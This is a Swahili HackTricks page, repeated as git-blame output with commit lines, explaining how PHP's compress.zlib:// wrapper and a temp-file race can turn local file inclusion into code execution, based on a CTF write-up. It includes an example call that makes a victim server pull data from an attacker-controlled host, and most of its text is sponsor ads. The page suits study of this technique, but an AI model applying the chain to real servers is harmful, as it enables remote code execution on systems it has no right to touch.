hacktricks/pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md

# LFI2RCE Kupitia compress.zlib + PHP\_STREAM\_PREFER\_STUDIO + Kufichua Njia

<details>

<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>

#### [WhiteIntel](https://whiteintel.io)

<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>

[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wame **vamiwa** na **malware za wizi**.

Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.

Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:

{% embed url="https://whiteintel.io" %}

***

### `compress.zlib://` na `PHP_STREAM_PREFER_STDIO`

Faili iliyofunguliwa kwa kutumia itifaki ya `compress.zlib://` na bendera `PHP_STREAM_PREFER_STDIO` inaweza kuendelea kuandika data inayofika kwenye uhusiano baadaye kwenye faili hiyo hiyo.

Hii inamaanisha kwamba wito kama:
```php
file_get_contents("compress.zlib://http://attacker.com/file")
```
Utatuma ombi ukiomba http://attacker.com/file, kisha server inaweza kujibu ombi hilo na jibu sahihi la HTTP, kuweka uhusiano wazi, na kutuma data ziada baadaye ambayo itaandikwa pia kwenye faili.

Unaweza kuona habari hiyo katika sehemu hii ya msimbo wa php-src katika main/streams/cast.c:
```c
/* Use a tmpfile and copy the old streams contents into it */

if (flags & PHP_STREAM_PREFER_STDIO) {
*newstream = php_stream_fopen_tmpfile();
} else {
*newstream = php_stream_temp_new();
}
```
### Mashindano ya Mashindano hadi RCE

[**CTF hii**](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer) ilishughulikiwa kwa kutumia hila iliyopita.

Mshambuliaji atafanya **seva ya mwathirika ifungue uhusiano ikisoma faili kutoka kwa seva ya mshambuliaji** kwa kutumia itifaki ya **`compress.zlib`**.

**Wakati** huu **uhusiano** ukiwepo mshambuliaji atafanya **kuvuja njia** ya faili ya muda iliyoundwa (inavuja na seva).

**Wakati** **uhusiano** bado uko wazi, mshambuliaji atatumia LFI kwa **kupakia faili ya muda** ambayo anadhibiti.

Hata hivyo, kuna ukaguzi kwenye seva ya wavuti ambao **unazuia kupakia faili zinazoleta `<?`**. Kwa hivyo, mshambuliaji atatumia **Race Condition**. Katika uhusiano ambao bado uko wazi **mshambuliaji** atatuma mzigo wa PHP **BAADA YA** **wavuti** kuchunguza ikiwa faili ina herufi zilizopigwa marufuku lakini **KABLA haijapakia maudhui yake**.

Kwa habari zaidi angalia maelezo ya Race Condition na CTF kwenye [https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer)

#### [WhiteIntel](https://whiteintel.io)

<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>

[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumiwa na **dark-web** inayotoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.

Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za wizi wa habari.

Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:

{% embed url="https://whiteintel.io" %}

<details>

<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 **kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au **kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00			`# LFI2RCE Kupitia compress.zlib + PHP\_STREAM\_PREFER\_STUDIO + Kufichua Njia`

Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00			`<details>`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00			`<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Njia nyingine za kusaidia HackTricks:`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00			`* Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia [MIPANGO YA USAJILI](https://github.com/sponsors/carlospolop)!`
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`* Pata [bidhaa rasmi za PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Gundua [Familia ya PEASS](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [NFTs](https://opensea.io/collection/the-peass-family) za kipekee`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00			`* Jiunge na 💬 [Kikundi cha Discord](https://discord.gg/hRep4RUj7f) au kikundi cha [telegram](https://t.me/peass) au tufuate kwenye Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks\_live).`
			`* Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa [HackTricks](https://github.com/carlospolop/hacktricks) na [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repos za github.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00			`#### [WhiteIntel](https://whiteintel.io)`
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00			`<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>`
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00			`[WhiteIntel](https://whiteintel.io) ni injini ya utaftaji inayotumia dark-web ambayo inatoa huduma za bure za kuangalia ikiwa kampuni au wateja wake wame vamiwa na malware za wizi.`
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00			`Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.`
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00
			`Unaweza kutembelea tovuti yao na kujaribu injini yao bure kwa:`

			`{% embed url="https://whiteintel.io" %}`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00			`***`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00			### `compress.zlib://` na `PHP_STREAM_PREFER_STDIO`
GitBook: [#3115] No subject 2022-04-21 00:07:27 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			Faili iliyofunguliwa kwa kutumia itifaki ya `compress.zlib://` na bendera `PHP_STREAM_PREFER_STDIO` inaweza kuendelea kuandika data inayofika kwenye uhusiano baadaye kwenye faili hiyo hiyo.
GitBook: [#3115] No subject 2022-04-21 00:07:27 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00			`Hii inamaanisha kwamba wito kama:`
GitBook: [#3115] No subject 2022-04-21 00:07:27 +00:00			```php
			`file_get_contents("compress.zlib://http://attacker.com/file")`
			```
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00			`Utatuma ombi ukiomba http://attacker.com/file, kisha server inaweza kujibu ombi hilo na jibu sahihi la HTTP, kuweka uhusiano wazi, na kutuma data ziada baadaye ambayo itaandikwa pia kwenye faili.`
GitBook: [#3115] No subject 2022-04-21 00:07:27 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Unaweza kuona habari hiyo katika sehemu hii ya msimbo wa php-src katika main/streams/cast.c:`
GitBook: [#3115] No subject 2022-04-21 00:07:27 +00:00			```c
			`/* Use a tmpfile and copy the old streams contents into it */`

Translated to Swahili 2024-02-11 02:13:58 +00:00			`if (flags & PHP_STREAM_PREFER_STDIO) {`
			`*newstream = php_stream_fopen_tmpfile();`
			`} else {`
			`*newstream = php_stream_temp_new();`
			`}`
GitBook: [#3115] No subject 2022-04-21 00:07:27 +00:00			```
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00			`### Mashindano ya Mashindano hadi RCE`
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00			`[CTF hii](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer) ilishughulikiwa kwa kutumia hila iliyopita.`
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00			Mshambuliaji atafanya seva ya mwathirika ifungue uhusiano ikisoma faili kutoka kwa seva ya mshambuliaji kwa kutumia itifaki ya `compress.zlib`.
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00
Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack. 2024-04-18 04:08:12 +00:00			`Wakati huu uhusiano ukiwepo mshambuliaji atafanya kuvuja njia ya faili ya muda iliyoundwa (inavuja na seva).`
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00			`Wakati uhusiano bado uko wazi, mshambuliaji atatumia LFI kwa kupakia faili ya muda ambayo anadhibiti.`
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00			Hata hivyo, kuna ukaguzi kwenye seva ya wavuti ambao unazuia kupakia faili zinazoleta `<?`. Kwa hivyo, mshambuliaji atatumia Race Condition. Katika uhusiano ambao bado uko wazi mshambuliaji atatuma mzigo wa PHP BAADA YA wavuti kuchunguza ikiwa faili ina herufi zilizopigwa marufuku lakini KABLA haijapakia maudhui yake.
GitBook: [#3115] No subject 2022-04-21 00:07:27 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00			`Kwa habari zaidi angalia maelezo ya Race Condition na CTF kwenye [https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer)`
GitBook: [#3115] No subject 2022-04-21 00:07:27 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00			`#### [WhiteIntel](https://whiteintel.io)`
GitBook: [#3115] No subject 2022-04-21 00:07:27 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00			`<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>`
GitBook: [#3115] No subject 2022-04-21 00:07:27 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`[WhiteIntel](https://whiteintel.io) ni injini ya utaftaji inayotumiwa na dark-web inayotoa huduma za bure za kuangalia ikiwa kampuni au wateja wake wameathiriwa na malware za wizi.`
GitBook: [#3115] No subject 2022-04-21 00:07:27 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00			`Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za wizi wa habari.`
GitBook: [#3115] No subject 2022-04-21 00:07:27 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`Unaweza kutembelea tovuti yao na kujaribu injini yao bure kwa:`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`{% embed url="https://whiteintel.io" %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00			`<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Njia nyingine za kusaidia HackTricks:`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`* Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia [MIPANGO YA KUJIUNGA](https://github.com/sponsors/carlospolop)!`
			`* Pata [bidhaa rasmi za PEASS & HackTricks](https://peass.creator-spring.com)`
Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack. 2024-04-18 04:08:12 +00:00			`* Gundua [Familia ya PEASS](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [NFTs](https://opensea.io/collection/the-peass-family) za kipekee`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00			`* Jiunge na 💬 kikundi cha Discord](https://discord.gg/hRep4RUj7f) au kikundi cha telegram](https://t.me/peass) au tufuate kwenye Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks\_live).`
			`* Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa [HackTricks](https://github.com/carlospolop/hacktricks) na [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`